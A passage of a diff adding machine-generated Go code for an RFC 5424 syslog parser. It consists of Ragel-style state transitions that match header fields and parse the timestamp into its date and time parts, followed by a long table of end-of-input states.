+ } + st_case_490: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st491 + } + goto st0 + st491: + if (p)++; (p) == (pe) { + goto _test_eof491 + } + st_case_491: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st492 + } + goto st0 + st492: + if (p)++; (p) == (pe) { + goto _test_eof492 + } + st_case_492: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st493 + } + goto st0 + st493: + if (p)++; (p) == (pe) { + goto _test_eof493 + } + st_case_493: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st494 + } + goto st0 + st494: + if (p)++; (p) == (pe) { + goto _test_eof494 + } + st_case_494: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st495 + } + goto st0 + st495: + if (p)++; (p) == (pe) { + goto _test_eof495 + } + st_case_495: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st496 + } + goto st0 + st496: + if (p)++; (p) == (pe) { + goto _test_eof496 + } + st_case_496: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st497 + } + goto st0 + st497: + if (p)++; (p) == (pe) { + goto _test_eof497 + } + st_case_497: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st498 + } + goto st0 + st498: + if (p)++; (p) == (pe) { + goto _test_eof498 + } + st_case_498: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st499 + } + goto st0 + st499: + if (p)++; (p) == (pe) { + goto _test_eof499 + } + st_case_499: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st500 + } + goto st0 + st500: + if (p)++; (p) == (pe) { + goto _test_eof500 + } + st_case_500: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st501 + } + goto st0 + st501: + if (p)++; (p) == 
(pe) { + goto _test_eof501 + } + st_case_501: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st502 + } + goto st0 + st502: + if (p)++; (p) == (pe) { + goto _test_eof502 + } + st_case_502: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st503 + } + goto st0 + st503: + if (p)++; (p) == (pe) { + goto _test_eof503 + } + st_case_503: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st504 + } + goto st0 + st504: + if (p)++; (p) == (pe) { + goto _test_eof504 + } + st_case_504: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st505 + } + goto st0 + st505: + if (p)++; (p) == (pe) { + goto _test_eof505 + } + st_case_505: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st506 + } + goto st0 + st506: + if (p)++; (p) == (pe) { + goto _test_eof506 + } + st_case_506: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st507 + } + goto st0 + st507: + if (p)++; (p) == (pe) { + goto _test_eof507 + } + st_case_507: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st508 + } + goto st0 + st508: + if (p)++; (p) == (pe) { + goto _test_eof508 + } + st_case_508: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st509 + } + goto st0 + st509: + if (p)++; (p) == (pe) { + goto _test_eof509 + } + st_case_509: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st510 + } + goto st0 + st510: + if (p)++; (p) == (pe) { + goto _test_eof510 + } + st_case_510: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st511 + } + goto st0 + st511: + if (p)++; (p) == (pe) { + goto _test_eof511 + } + st_case_511: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st512 + } + goto st0 + 
st512: + if (p)++; (p) == (pe) { + goto _test_eof512 + } + st_case_512: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st513 + } + goto st0 + st513: + if (p)++; (p) == (pe) { + goto _test_eof513 + } + st_case_513: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st514 + } + goto st0 + st514: + if (p)++; (p) == (pe) { + goto _test_eof514 + } + st_case_514: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st515 + } + goto st0 + st515: + if (p)++; (p) == (pe) { + goto _test_eof515 + } + st_case_515: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st516 + } + goto st0 + st516: + if (p)++; (p) == (pe) { + goto _test_eof516 + } + st_case_516: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st517 + } + goto st0 + st517: + if (p)++; (p) == (pe) { + goto _test_eof517 + } + st_case_517: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st518 + } + goto st0 + st518: + if (p)++; (p) == (pe) { + goto _test_eof518 + } + st_case_518: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st519 + } + goto st0 + st519: + if (p)++; (p) == (pe) { + goto _test_eof519 + } + st_case_519: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st520 + } + goto st0 + st520: + if (p)++; (p) == (pe) { + goto _test_eof520 + } + st_case_520: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st521 + } + goto st0 + st521: + if (p)++; (p) == (pe) { + goto _test_eof521 + } + st_case_521: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st522 + } + goto st0 + st522: + if (p)++; (p) == (pe) { + goto _test_eof522 + } + st_case_522: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + 
goto st523 + } + goto st0 + st523: + if (p)++; (p) == (pe) { + goto _test_eof523 + } + st_case_523: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st524 + } + goto st0 + st524: + if (p)++; (p) == (pe) { + goto _test_eof524 + } + st_case_524: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st525 + } + goto st0 + st525: + if (p)++; (p) == (pe) { + goto _test_eof525 + } + st_case_525: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st526 + } + goto st0 + st526: + if (p)++; (p) == (pe) { + goto _test_eof526 + } + st_case_526: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st527 + } + goto st0 + st527: + if (p)++; (p) == (pe) { + goto _test_eof527 + } + st_case_527: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st528 + } + goto st0 + st528: + if (p)++; (p) == (pe) { + goto _test_eof528 + } + st_case_528: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st529 + } + goto st0 + st529: + if (p)++; (p) == (pe) { + goto _test_eof529 + } + st_case_529: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st530 + } + goto st0 + st530: + if (p)++; (p) == (pe) { + goto _test_eof530 + } + st_case_530: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st531 + } + goto st0 + st531: + if (p)++; (p) == (pe) { + goto _test_eof531 + } + st_case_531: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st532 + } + goto st0 + st532: + if (p)++; (p) == (pe) { + goto _test_eof532 + } + st_case_532: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st533 + } + goto st0 + st533: + if (p)++; (p) == (pe) { + goto _test_eof533 + } + st_case_533: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] 
&& data[(p)] <= 126 { + goto st534 + } + goto st0 + st534: + if (p)++; (p) == (pe) { + goto _test_eof534 + } + st_case_534: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st535 + } + goto st0 + st535: + if (p)++; (p) == (pe) { + goto _test_eof535 + } + st_case_535: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st536 + } + goto st0 + st536: + if (p)++; (p) == (pe) { + goto _test_eof536 + } + st_case_536: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st537 + } + goto st0 + st537: + if (p)++; (p) == (pe) { + goto _test_eof537 + } + st_case_537: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st538 + } + goto st0 + st538: + if (p)++; (p) == (pe) { + goto _test_eof538 + } + st_case_538: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st539 + } + goto st0 + st539: + if (p)++; (p) == (pe) { + goto _test_eof539 + } + st_case_539: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st540 + } + goto st0 + st540: + if (p)++; (p) == (pe) { + goto _test_eof540 + } + st_case_540: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st541 + } + goto st0 + st541: + if (p)++; (p) == (pe) { + goto _test_eof541 + } + st_case_541: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st542 + } + goto st0 + st542: + if (p)++; (p) == (pe) { + goto _test_eof542 + } + st_case_542: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st543 + } + goto st0 + st543: + if (p)++; (p) == (pe) { + goto _test_eof543 + } + st_case_543: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st544 + } + goto st0 + st544: + if (p)++; (p) == (pe) { + goto _test_eof544 + } + st_case_544: + if data[(p)] == 32 { + goto tr13 
+ } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st545 + } + goto st0 + st545: + if (p)++; (p) == (pe) { + goto _test_eof545 + } + st_case_545: + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st546 + } + goto st0 + st546: + if (p)++; (p) == (pe) { + goto _test_eof546 + } + st_case_546: + if data[(p)] == 32 { + goto tr13 + } + goto st0 + tr10: +//line parser/common.rl:3 + + tok = p + + goto st547 + st547: + if (p)++; (p) == (pe) { + goto _test_eof547 + } + st_case_547: +//line rfc5424_parser.go:8576 + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st548 + } + goto st0 + st548: + if (p)++; (p) == (pe) { + goto _test_eof548 + } + st_case_548: + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st549 + } + goto st0 + st549: + if (p)++; (p) == (pe) { + goto _test_eof549 + } + st_case_549: + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st550 + } + goto st0 + st550: + if (p)++; (p) == (pe) { + goto _test_eof550 + } + st_case_550: + if data[(p)] == 45 { + goto tr559 + } + goto st0 + tr559: +//line parser/common.rl:19 + + event.SetYear(data[tok:p]) + + goto st551 + st551: + if (p)++; (p) == (pe) { + goto _test_eof551 + } + st_case_551: +//line rfc5424_parser.go:8619 + switch data[(p)] { + case 48: + goto tr560 + case 49: + goto tr561 + } + goto st0 + tr560: +//line parser/common.rl:3 + + tok = p + + goto st552 + st552: + if (p)++; (p) == (pe) { + goto _test_eof552 + } + st_case_552: +//line rfc5424_parser.go:8638 + if 49 <= data[(p)] && data[(p)] <= 57 { + goto st553 + } + goto st0 + st553: + if (p)++; (p) == (pe) { + goto _test_eof553 + } + st_case_553: + if data[(p)] == 45 { + goto tr563 + } + goto st0 + tr563: +//line parser/common.rl:23 + + event.SetMonthNumeric(data[tok:p]) + + goto st554 + st554: + if (p)++; (p) == (pe) { + goto _test_eof554 + } + st_case_554: +//line rfc5424_parser.go:8663 + if data[(p)] == 51 { + goto tr565 + } + if 49 <= data[(p)] && data[(p)] <= 50 { + goto tr564 + } + goto st0 + tr564: +//line 
parser/common.rl:3 + + tok = p + + goto st555 + st555: + if (p)++; (p) == (pe) { + goto _test_eof555 + } + st_case_555: +//line rfc5424_parser.go:8682 + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st556 + } + goto st0 + st556: + if (p)++; (p) == (pe) { + goto _test_eof556 + } + st_case_556: + if data[(p)] == 84 { + goto tr567 + } + goto st0 + tr567: +//line parser/common.rl:27 + + event.SetDay(data[tok:p]) + + goto st557 + st557: + if (p)++; (p) == (pe) { + goto _test_eof557 + } + st_case_557: +//line rfc5424_parser.go:8707 + if data[(p)] == 50 { + goto tr569 + } + if 48 <= data[(p)] && data[(p)] <= 49 { + goto tr568 + } + goto st0 + tr568: +//line parser/common.rl:3 + + tok = p + + goto st558 + st558: + if (p)++; (p) == (pe) { + goto _test_eof558 + } + st_case_558: +//line rfc5424_parser.go:8726 + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st559 + } + goto st0 + st559: + if (p)++; (p) == (pe) { + goto _test_eof559 + } + st_case_559: + if data[(p)] == 58 { + goto tr571 + } + goto st0 + tr571: +//line parser/common.rl:31 + + event.SetHour(data[tok:p]) + + goto st560 + st560: + if (p)++; (p) == (pe) { + goto _test_eof560 + } + st_case_560: +//line rfc5424_parser.go:8751 + if 48 <= data[(p)] && data[(p)] <= 53 { + goto tr572 + } + goto st0 + tr572: +//line parser/common.rl:3 + + tok = p + + goto st561 + st561: + if (p)++; (p) == (pe) { + goto _test_eof561 + } + st_case_561: +//line rfc5424_parser.go:8767 + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st562 + } + goto st0 + st562: + if (p)++; (p) == (pe) { + goto _test_eof562 + } + st_case_562: + if data[(p)] == 58 { + goto tr574 + } + goto st0 + tr574: +//line parser/common.rl:35 + + event.SetMinute(data[tok:p]) + + goto st563 + st563: + if (p)++; (p) == (pe) { + goto _test_eof563 + } + st_case_563: +//line rfc5424_parser.go:8792 + if 48 <= data[(p)] && data[(p)] <= 53 { + goto tr575 + } + goto st0 + tr575: +//line parser/common.rl:3 + + tok = p + + goto st564 + st564: + if (p)++; (p) == (pe) { + goto 
_test_eof564 + } + st_case_564: +//line rfc5424_parser.go:8808 + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st565 + } + goto st0 + st565: + if (p)++; (p) == (pe) { + goto _test_eof565 + } + st_case_565: + switch data[(p)] { + case 43: + goto tr577 + case 45: + goto tr577 + case 46: + goto tr578 + case 90: + goto tr579 + } + goto st0 + tr577: +//line parser/common.rl:39 + + event.SetSecond(data[tok:p]) + +//line parser/common.rl:3 + + tok = p + + goto st566 + tr587: +//line parser/common.rl:43 + + event.SetNanosecond(data[tok:p]) + +//line parser/common.rl:3 + + tok = p + + goto st566 + st566: + if (p)++; (p) == (pe) { + goto _test_eof566 + } + st_case_566: +//line rfc5424_parser.go:8854 + if 48 <= data[(p)] && data[(p)] <= 53 { + goto st567 + } + goto st0 + st567: + if (p)++; (p) == (pe) { + goto _test_eof567 + } + st_case_567: + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st568 + } + goto st0 + st568: + if (p)++; (p) == (pe) { + goto _test_eof568 + } + st_case_568: + if data[(p)] == 58 { + goto st569 + } + goto st0 + st569: + if (p)++; (p) == (pe) { + goto _test_eof569 + } + st_case_569: + if 48 <= data[(p)] && data[(p)] <= 53 { + goto st570 + } + goto st0 + st570: + if (p)++; (p) == (pe) { + goto _test_eof570 + } + st_case_570: + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st571 + } + goto st0 + st571: + if (p)++; (p) == (pe) { + goto _test_eof571 + } + st_case_571: + if data[(p)] == 32 { + goto tr585 + } + goto st0 + tr578: +//line parser/common.rl:39 + + event.SetSecond(data[tok:p]) + + goto st572 + st572: + if (p)++; (p) == (pe) { + goto _test_eof572 + } + st_case_572: +//line rfc5424_parser.go:8915 + if 48 <= data[(p)] && data[(p)] <= 57 { + goto tr586 + } + goto st0 + tr586: +//line parser/common.rl:3 + + tok = p + + goto st573 + st573: + if (p)++; (p) == (pe) { + goto _test_eof573 + } + st_case_573: +//line rfc5424_parser.go:8931 + switch data[(p)] { + case 43: + goto tr587 + case 45: + goto tr587 + case 90: + goto tr589 + } + if 48 <= data[(p)] 
&& data[(p)] <= 57 { + goto st574 + } + goto st0 + st574: + if (p)++; (p) == (pe) { + goto _test_eof574 + } + st_case_574: + switch data[(p)] { + case 43: + goto tr587 + case 45: + goto tr587 + case 90: + goto tr589 + } + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st575 + } + goto st0 + st575: + if (p)++; (p) == (pe) { + goto _test_eof575 + } + st_case_575: + switch data[(p)] { + case 43: + goto tr587 + case 45: + goto tr587 + case 90: + goto tr589 + } + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st576 + } + goto st0 + st576: + if (p)++; (p) == (pe) { + goto _test_eof576 + } + st_case_576: + switch data[(p)] { + case 43: + goto tr587 + case 45: + goto tr587 + case 90: + goto tr589 + } + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st577 + } + goto st0 + st577: + if (p)++; (p) == (pe) { + goto _test_eof577 + } + st_case_577: + switch data[(p)] { + case 43: + goto tr587 + case 45: + goto tr587 + case 90: + goto tr589 + } + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st578 + } + goto st0 + st578: + if (p)++; (p) == (pe) { + goto _test_eof578 + } + st_case_578: + switch data[(p)] { + case 43: + goto tr587 + case 45: + goto tr587 + case 90: + goto tr589 + } + goto st0 + tr569: +//line parser/common.rl:3 + + tok = p + + goto st579 + st579: + if (p)++; (p) == (pe) { + goto _test_eof579 + } + st_case_579: +//line rfc5424_parser.go:9037 + if 48 <= data[(p)] && data[(p)] <= 51 { + goto st559 + } + goto st0 + tr565: +//line parser/common.rl:3 + + tok = p + + goto st580 + st580: + if (p)++; (p) == (pe) { + goto _test_eof580 + } + st_case_580: +//line rfc5424_parser.go:9053 + if 48 <= data[(p)] && data[(p)] <= 49 { + goto st556 + } + goto st0 + tr561: +//line parser/common.rl:3 + + tok = p + + goto st581 + st581: + if (p)++; (p) == (pe) { + goto _test_eof581 + } + st_case_581: +//line rfc5424_parser.go:9069 + if 48 <= data[(p)] && data[(p)] <= 50 { + goto st553 + } + goto st0 + st582: + if (p)++; (p) == (pe) { + goto _test_eof582 + } + st_case_582: + if data[(p)] 
== 32 { + goto tr7 + } + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st583 + } + goto st0 + st583: + if (p)++; (p) == (pe) { + goto _test_eof583 + } + st_case_583: + if data[(p)] == 32 { + goto tr7 + } + goto st0 + tr3: +//line parser/common.rl:3 + + tok = p + + goto st584 + st584: + if (p)++; (p) == (pe) { + goto _test_eof584 + } + st_case_584: +//line rfc5424_parser.go:9106 + switch data[(p)] { + case 57: + goto st586 + case 62: + goto tr5 + } + if 48 <= data[(p)] && data[(p)] <= 56 { + goto st585 + } + goto st0 + tr4: +//line parser/common.rl:3 + + tok = p + + goto st585 + st585: + if (p)++; (p) == (pe) { + goto _test_eof585 + } + st_case_585: +//line rfc5424_parser.go:9128 + if data[(p)] == 62 { + goto tr5 + } + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st3 + } + goto st0 + st586: + if (p)++; (p) == (pe) { + goto _test_eof586 + } + st_case_586: + if data[(p)] == 62 { + goto tr5 + } + if 48 <= data[(p)] && data[(p)] <= 49 { + goto st3 + } + goto st0 + st_out: + _test_eof2: + cs = 2 + goto _test_eof + _test_eof3: + cs = 3 + goto _test_eof + _test_eof4: + cs = 4 + goto _test_eof + _test_eof5: + cs = 5 + goto _test_eof + _test_eof6: + cs = 6 + goto _test_eof + _test_eof7: + cs = 7 + goto _test_eof + _test_eof8: + cs = 8 + goto _test_eof + _test_eof9: + cs = 9 + goto _test_eof + _test_eof10: + cs = 10 + goto _test_eof + _test_eof11: + cs = 11 + goto _test_eof + _test_eof12: + cs = 12 + goto _test_eof + _test_eof13: + cs = 13 + goto _test_eof + _test_eof14: + cs = 14 + goto _test_eof + _test_eof15: + cs = 15 + goto _test_eof + _test_eof16: + cs = 16 + goto _test_eof + _test_eof587: + cs = 587 + goto _test_eof + _test_eof588: + cs = 588 + goto _test_eof + _test_eof589: + cs = 589 + goto _test_eof + _test_eof17: + cs = 17 + goto _test_eof + _test_eof18: + cs = 18 + goto _test_eof + _test_eof19: + cs = 19 + goto _test_eof + _test_eof20: + cs = 20 + goto _test_eof + _test_eof21: + cs = 21 + goto _test_eof + _test_eof22: + cs = 22 + goto _test_eof + _test_eof23: + 
cs = 23 + goto _test_eof + _test_eof24: + cs = 24 + goto _test_eof + _test_eof25: + cs = 25 + goto _test_eof + _test_eof26: + cs = 26 + goto _test_eof + _test_eof27: + cs = 27 + goto _test_eof + _test_eof28: + cs = 28 + goto _test_eof + _test_eof29: + cs = 29 + goto _test_eof + _test_eof30: + cs = 30 + goto _test_eof + _test_eof31: + cs = 31 + goto _test_eof + _test_eof32: + cs = 32 + goto _test_eof + _test_eof33: + cs = 33 + goto _test_eof + _test_eof34: + cs = 34 + goto _test_eof + _test_eof35: + cs = 35 + goto _test_eof + _test_eof36: + cs = 36 + goto _test_eof + _test_eof37: + cs = 37 + goto _test_eof + _test_eof38: + cs = 38 + goto _test_eof + _test_eof39: + cs = 39 + goto _test_eof + _test_eof40: + cs = 40 + goto _test_eof + _test_eof41: + cs = 41 + goto _test_eof + _test_eof42: + cs = 42 + goto _test_eof + _test_eof43: + cs = 43 + goto _test_eof + _test_eof44: + cs = 44 + goto _test_eof + _test_eof45: + cs = 45 + goto _test_eof + _test_eof46: + cs = 46 + goto _test_eof + _test_eof47: + cs = 47 + goto _test_eof + _test_eof48: + cs = 48 + goto _test_eof + _test_eof49: + cs = 49 + goto _test_eof + _test_eof50: + cs = 50 + goto _test_eof + _test_eof51: + cs = 51 + goto _test_eof + _test_eof52: + cs = 52 + goto _test_eof + _test_eof53: + cs = 53 + goto _test_eof + _test_eof54: + cs = 54 + goto _test_eof + _test_eof55: + cs = 55 + goto _test_eof + _test_eof590: + cs = 590 + goto _test_eof + _test_eof56: + cs = 56 + goto _test_eof + _test_eof57: + cs = 57 + goto _test_eof + _test_eof58: + cs = 58 + goto _test_eof + _test_eof59: + cs = 59 + goto _test_eof + _test_eof60: + cs = 60 + goto _test_eof + _test_eof61: + cs = 61 + goto _test_eof + _test_eof62: + cs = 62 + goto _test_eof + _test_eof63: + cs = 63 + goto _test_eof + _test_eof64: + cs = 64 + goto _test_eof + _test_eof65: + cs = 65 + goto _test_eof + _test_eof66: + cs = 66 + goto _test_eof + _test_eof67: + cs = 67 + goto _test_eof + _test_eof68: + cs = 68 + goto _test_eof + _test_eof69: + cs = 69 + goto 
_test_eof + _test_eof70: + cs = 70 + goto _test_eof + _test_eof71: + cs = 71 + goto _test_eof + _test_eof72: + cs = 72 + goto _test_eof + _test_eof73: + cs = 73 + goto _test_eof + _test_eof74: + cs = 74 + goto _test_eof + _test_eof75: + cs = 75 + goto _test_eof + _test_eof76: + cs = 76 + goto _test_eof + _test_eof77: + cs = 77 + goto _test_eof + _test_eof78: + cs = 78 + goto _test_eof + _test_eof79: + cs = 79 + goto _test_eof + _test_eof80: + cs = 80 + goto _test_eof + _test_eof81: + cs = 81 + goto _test_eof + _test_eof82: + cs = 82 + goto _test_eof + _test_eof83: + cs = 83 + goto _test_eof + _test_eof84: + cs = 84 + goto _test_eof + _test_eof85: + cs = 85 + goto _test_eof + _test_eof86: + cs = 86 + goto _test_eof + _test_eof87: + cs = 87 + goto _test_eof + _test_eof88: + cs = 88 + goto _test_eof + _test_eof89: + cs = 89 + goto _test_eof + _test_eof90: + cs = 90 + goto _test_eof + _test_eof91: + cs = 91 + goto _test_eof + _test_eof92: + cs = 92 + goto _test_eof + _test_eof93: + cs = 93 + goto _test_eof + _test_eof94: + cs = 94 + goto _test_eof + _test_eof95: + cs = 95 + goto _test_eof + _test_eof96: + cs = 96 + goto _test_eof + _test_eof97: + cs = 97 + goto _test_eof + _test_eof98: + cs = 98 + goto _test_eof + _test_eof99: + cs = 99 + goto _test_eof + _test_eof100: + cs = 100 + goto _test_eof + _test_eof101: + cs = 101 + goto _test_eof + _test_eof102: + cs = 102 + goto _test_eof + _test_eof103: + cs = 103 + goto _test_eof + _test_eof104: + cs = 104 + goto _test_eof + _test_eof105: + cs = 105 + goto _test_eof + _test_eof106: + cs = 106 + goto _test_eof + _test_eof107: + cs = 107 + goto _test_eof + _test_eof108: + cs = 108 + goto _test_eof + _test_eof109: + cs = 109 + goto _test_eof + _test_eof110: + cs = 110 + goto _test_eof + _test_eof111: + cs = 111 + goto _test_eof + _test_eof112: + cs = 112 + goto _test_eof + _test_eof113: + cs = 113 + goto _test_eof + _test_eof114: + cs = 114 + goto _test_eof + _test_eof115: + cs = 115 + goto _test_eof + _test_eof116: + cs = 
116 + goto _test_eof + _test_eof117: + cs = 117 + goto _test_eof + _test_eof118: + cs = 118 + goto _test_eof + _test_eof119: + cs = 119 + goto _test_eof + _test_eof120: + cs = 120 + goto _test_eof + _test_eof121: + cs = 121 + goto _test_eof + _test_eof122: + cs = 122 + goto _test_eof + _test_eof123: + cs = 123 + goto _test_eof + _test_eof124: + cs = 124 + goto _test_eof + _test_eof125: + cs = 125 + goto _test_eof + _test_eof126: + cs = 126 + goto _test_eof + _test_eof127: + cs = 127 + goto _test_eof + _test_eof128: + cs = 128 + goto _test_eof + _test_eof129: + cs = 129 + goto _test_eof + _test_eof130: + cs = 130 + goto _test_eof + _test_eof131: + cs = 131 + goto _test_eof + _test_eof132: + cs = 132 + goto _test_eof + _test_eof133: + cs = 133 + goto _test_eof + _test_eof134: + cs = 134 + goto _test_eof + _test_eof135: + cs = 135 + goto _test_eof + _test_eof136: + cs = 136 + goto _test_eof + _test_eof137: + cs = 137 + goto _test_eof + _test_eof138: + cs = 138 + goto _test_eof + _test_eof139: + cs = 139 + goto _test_eof + _test_eof140: + cs = 140 + goto _test_eof + _test_eof141: + cs = 141 + goto _test_eof + _test_eof142: + cs = 142 + goto _test_eof + _test_eof143: + cs = 143 + goto _test_eof + _test_eof144: + cs = 144 + goto _test_eof + _test_eof145: + cs = 145 + goto _test_eof + _test_eof146: + cs = 146 + goto _test_eof + _test_eof147: + cs = 147 + goto _test_eof + _test_eof148: + cs = 148 + goto _test_eof + _test_eof149: + cs = 149 + goto _test_eof + _test_eof150: + cs = 150 + goto _test_eof + _test_eof151: + cs = 151 + goto _test_eof + _test_eof152: + cs = 152 + goto _test_eof + _test_eof153: + cs = 153 + goto _test_eof + _test_eof154: + cs = 154 + goto _test_eof + _test_eof155: + cs = 155 + goto _test_eof + _test_eof156: + cs = 156 + goto _test_eof + _test_eof157: + cs = 157 + goto _test_eof + _test_eof158: + cs = 158 + goto _test_eof + _test_eof159: + cs = 159 + goto _test_eof + _test_eof160: + cs = 160 + goto _test_eof + _test_eof161: + cs = 161 + goto 
_test_eof + _test_eof162: + cs = 162 + goto _test_eof + _test_eof163: + cs = 163 + goto _test_eof + _test_eof164: + cs = 164 + goto _test_eof + _test_eof165: + cs = 165 + goto _test_eof + _test_eof166: + cs = 166 + goto _test_eof + _test_eof167: + cs = 167 + goto _test_eof + _test_eof168: + cs = 168 + goto _test_eof + _test_eof169: + cs = 169 + goto _test_eof + _test_eof170: + cs = 170 + goto _test_eof + _test_eof171: + cs = 171 + goto _test_eof + _test_eof172: + cs = 172 + goto _test_eof + _test_eof173: + cs = 173 + goto _test_eof + _test_eof174: + cs = 174 + goto _test_eof + _test_eof175: + cs = 175 + goto _test_eof + _test_eof176: + cs = 176 + goto _test_eof + _test_eof177: + cs = 177 + goto _test_eof + _test_eof178: + cs = 178 + goto _test_eof + _test_eof179: + cs = 179 + goto _test_eof + _test_eof180: + cs = 180 + goto _test_eof + _test_eof181: + cs = 181 + goto _test_eof + _test_eof182: + cs = 182 + goto _test_eof + _test_eof183: + cs = 183 + goto _test_eof + _test_eof184: + cs = 184 + goto _test_eof + _test_eof185: + cs = 185 + goto _test_eof + _test_eof186: + cs = 186 + goto _test_eof + _test_eof187: + cs = 187 + goto _test_eof + _test_eof188: + cs = 188 + goto _test_eof + _test_eof189: + cs = 189 + goto _test_eof + _test_eof190: + cs = 190 + goto _test_eof + _test_eof191: + cs = 191 + goto _test_eof + _test_eof192: + cs = 192 + goto _test_eof + _test_eof193: + cs = 193 + goto _test_eof + _test_eof194: + cs = 194 + goto _test_eof + _test_eof195: + cs = 195 + goto _test_eof + _test_eof196: + cs = 196 + goto _test_eof + _test_eof197: + cs = 197 + goto _test_eof + _test_eof198: + cs = 198 + goto _test_eof + _test_eof199: + cs = 199 + goto _test_eof + _test_eof200: + cs = 200 + goto _test_eof + _test_eof201: + cs = 201 + goto _test_eof + 